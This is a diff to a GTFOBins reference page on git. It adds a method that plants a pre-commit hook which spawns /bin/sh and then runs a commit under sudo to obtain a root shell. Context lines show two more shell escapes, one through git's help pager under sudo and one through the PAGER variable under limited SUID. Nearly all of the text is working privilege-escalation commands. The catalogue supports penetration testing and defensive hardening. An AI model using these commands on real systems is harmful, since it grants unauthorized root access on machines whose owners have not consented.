GTFOBins/GTFOBins.github.io/_gtfobins/git.md

       code: |
         sudo git branch --help config
         !/bin/sh
+    - description: Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used.
+Any other hook will work, just make sure to be able perform the proper action to trigger it.
+An existing repository can also be used and moving into the directory works too, i.e., instead of using the `-C` option.
+      code: |
+        TF=$(mktemp -d)
+        git init "$TF"
+        echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
+        mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
+        sudo git -C "$TF" commit --allow-empty -m x
   limited-suid:
     - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
 ---